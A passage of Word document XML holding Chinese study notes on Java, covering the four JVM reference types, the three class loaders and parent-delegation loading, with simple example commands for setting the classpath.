          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>会采用不同的方法进行回收，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象的引用分为了四种类型：</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）强引用：默认情况下，对象采用的均为强引用（这个对象的实例没有其他对象引用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时才会被回收）</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）软引用：软引用是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中提供的一种比较适合于缓存场景的应用（只有在内存不够用的情况下才会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）弱引用：在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时一定会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>回收</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRPr="003256B4"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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）虚引用：由于虚引用只是用来得知对象是否被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRPr="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00CB1B33">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00887194" w:rsidRPr="00F41A4C" w:rsidRDefault="00D021C8" w:rsidP="00D021C8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00F27C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.3</w:t>
      </w:r>
      <w:r w:rsidR="00887194" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004E53AD" w:rsidRPr="00F41A4C">
        <w:t>类加载机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162511" w:rsidRPr="00BA345F" w:rsidRDefault="00162511" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA345F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参考地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA345F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/love_Javc_you/article/details/38081683</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787" w:rsidRPr="00BA345F" w:rsidRDefault="00067787" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA345F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787" w:rsidRPr="00BA345F" w:rsidRDefault="00067787" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA345F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以上就是类加载的最一般的过程。</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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（启动类加载器）：加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.getProperty("sun.boot.class.path")</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所指定的路径或</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Extended Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（标准扩展类加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ExtClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）：加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.getProperty("java.ext.dirs")</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所指定的路径或</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。在使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行程序时，也可以指定其搜索路径，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java -Djava.ext.dirs=d:\projects\testproj\classes HelloWorld</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 </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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppClass Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（系统类加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）：加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.getProperty("java.class.path")</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所指定的路径或</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。在使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行程序时，也可以加上</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-cp</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来覆盖原有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Classpath</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>设置，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> java -cp ./lavasoft/classes HelloWorld</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 </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ExtClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动后，会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中保存一份，并且在程序运行中无法改变其搜索路径。如果想在运行时从其他搜索路径加载类，就要产生新的类加载器。</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 </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三、类加载器的特点</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 </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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、运行一个程序时，总是由</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AppClass Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（系统类加载器）开始加载指定的类。</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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、在加载类时，每个类加载器会将加载任务上交给其父，如果其父找不到，再由自己去加载。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
